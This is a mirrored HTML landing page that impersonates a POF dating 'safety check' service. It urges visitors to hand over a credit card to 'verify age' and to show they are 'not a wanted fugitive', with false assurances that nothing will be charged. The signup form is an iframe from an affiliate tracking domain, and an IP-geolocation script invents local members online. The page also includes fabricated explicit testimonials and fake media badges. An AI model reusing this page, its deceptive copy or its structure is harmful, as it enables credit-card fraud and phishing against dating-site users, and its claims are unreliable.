<!DOCTYPE html>
<html lang="en">



<!-- Mirrored from freemeetup.us/3561/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 30 Jan 2019 22:06:32 GMT -->

<!-- Mirrored from pofgirl.us/local/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 31 Jan 2019 19:19:45 GMT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=armscii-8">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">


  <!-- Basic Page Needs
  â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“ -->
  
  <title>POF.com &trade; The Leading Free Online Dating Site for Singles &amp; Personals</title>
  <meta name="description" content="">
  <meta name="author" content="">

  <!-- Mobile Specific Metas
  â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“ -->
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <!-- FONT
  â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“ -->
  <link href='https://fonts.googleapis.com/css?family=Merriweather+Sans:400,300,700' rel='stylesheet' type='text/css'>

  <!-- CSS
  â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“ -->
  <link rel="stylesheet" href="css/normalize.css">
  <link rel="stylesheet" href="css/skeleton.css">
  <link rel="stylesheet" href="css/style.css">

  <!-- Favicon
  â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“â€“ -->
  <link rel="icon" type="image/png" href="images/favicon.html">

  

</head>
<body>

    <header>
        <div class="container">
            <div class="row">
                <div class="six columns">
                    <img src="images/safechecklogo.png">
                </div>
                <div class="six columns nav">
                    <li><a href="#signup"  data-popup-open="popup-1">Search Members</a></li>
                    <li><a href="#signup"  data-popup-open="popup-1">Chat Room</a></li>
                    <li><a href="#signup"  data-popup-open="popup-1">Login</a></li>
                </div>
            </div>
        </div>
    </header>
    
    <div class="head">
        <div class="container">
            <div class="row">
                <div class="seven columns">
                    <div class="bighead">Verify. Search.<br> Find Sex, Hook-up, Meet Up for Sex</div>
                    <div class="subhead">Online (548129) in: <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template=<CITY>,%20<REGION>"></script></div>
                    <p>We provide a fast and secure service that makes meeting people on POF safer and easier. We ensure the people you meet are who they say they are.  
 <br><br>

After several incidents that took place via POF, we received media exposure and became one of the top free methods to protect women from sexual predators. Not only protect women, but we ensure men are not tricked into meeting up with underaged women.  
 <br><br>

It is US law that credit cards are not to be issued to citizens under the legal age of 18, thus we use your credit card to verify your age and check that you are not a wanted fugitive.</p>
                    
                    <img src="images/features.png">
                </div>
                <div class="five columns">
				<a href="https://your.softrtcknow.info/click?pid=27&offer_id=93"><img src="images/error-button.png" title="" width="100%" height="100%" /></a>
                    <a name="signup"><iframe src="http://your.softrtcknow.info/click?pid=27&offer_id=6" width="100%" height="670" scrolling="no"  frameBorder="0"></iframe>
					<br>
                    </div>
            </div>
        </div>
    </div>
    
    <div class="member">
        <div class="container">
            <div class="row">
                <div class="four columns">
                    <a class="image-popup-no-margins mainimage" href="#signup">
                        <img src="images/1.jpg" class="mainimage">
                    </a>
					<a class="image-popup-no-margins smallm" href="#signup">
                        <img src="images/2.jpg" class="" style="width:100%;">
                    </a>
                    
                    <a class="image-popup-no-margins smallm" href="#signup">
                        <img src="images/3.jpg" class="" style="width:100%;">
                    </a>
                    
                    <a class="image-popup-no-margins smallm" href="#signup">
                        <img src="images/4.jpg" class="" style="width:100%;">
                    </a>
                </div>
                <div class="four columns">
                     <li><b>About:</b> Not looking for anything serious, but open to see where things go! I do believe in love. Maybe one day i'll find it... Until then I'll keep looking and running around this beautiful world! Come be my partner in crime XoX </li>
                     <li><b>User-id:</b> On POF </li>
                     </div>
                <div class="four columns terms">
                    <h4>Member Terms (please read)</h4>
                    <p>By submitting the form above and providing your credit card, you agree to allow us to verify your age and make sure you are not a wanted fugitive.
<br>
We respect your privacy. This is a private and discreet service. Your card will not be charged. There will not be any charge on your statement or accounting. There are no further costs associated with this service.
                    <br>
                    </p>
                </div>
            </div>
        </div>
    </div>
    
    <div class="reviews">
        <div class="container">
            <div class="row">
            
                <a href="#signup"><img src="images/signupnow.png" class="verimem" style="margin-bottom: 50px;"></a>
            
            </div>
            <div class="row">
                <div class="one-third column">
                    <img src="profile-pics/jessica.png">
                    <h4>Jessica, 22</h4>
                    <p>I'm a very outgoing girl, but for some reason when it comes to talking to guys or trying to make a sexual move on someone I freeze up. This site is full of people looking for just one thing, making it easy for me to apprach others.</p>
                </div>
                <div class="one-third column">
                    <img src="profile-pics/TinaandRaymond.png">
                    <h4>Tina & Raymond, 34+</h4>
                    <p>We are a very happy couple that love to share our bodies with other couples. We are also open to having 1 other person join us. It turns both of us on when my wife has 2 dicks in her at once.</p>
                </div>
                <div class="one-third column">
                    <img src="profile-pics/staci.png">
                    <h4>Staci, 32</h4>
                    <p>I'm not into the whole 'swingers' things... probably because i'm single haha but this site has let me meet some very interesting characters that have shown me things in bed I never thought were possible. This site is hot!</p>
                </div>
            </div>
            <div class="row">
            
                <img src="images/as-seen-on.gif" class="verimem" style="width: 950px;">
				<br>
				<center><img src="images/n_1.jpg" style="width: 950px;"></center>
            
            </div>
        </div>
    </div>
    
    <div class="footer">
        <div class="container">
            <div class="row">
                <div class="twelve columns">
                    <h6>POF Casual Dating 2019 - Safe & Secure - Copywright Protected</h6>
                </div>
            </div>
        </div>
    </div>





<!-- Mirrored from freemeetup.us/3561/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 30 Jan 2019 22:06:32 GMT -->

<!-- Mirrored from pofgirl.us/local/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 31 Jan 2019 19:19:45 GMT -->
</html>